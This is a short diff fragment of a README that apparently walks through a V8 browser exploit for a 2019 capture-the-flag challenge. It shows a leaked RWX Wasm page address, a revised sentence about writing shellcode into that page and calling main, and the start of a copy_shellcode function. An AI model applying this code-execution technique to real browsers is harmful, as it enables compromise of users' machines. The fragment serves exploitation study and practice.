jackfromeast/browser-dojo/v8/2019-star-ctf-oob-v8/README.md

 [+] RWX Wasm page addr: 0x7b54b655000
 ```

-Then, we can copy our shellcode to that place.
+Therefore, we just need to place our shellcode to the starting address of the `RWX` page and call the `main` function.

 ```
 function copy_shellcode(addr, shellcode) {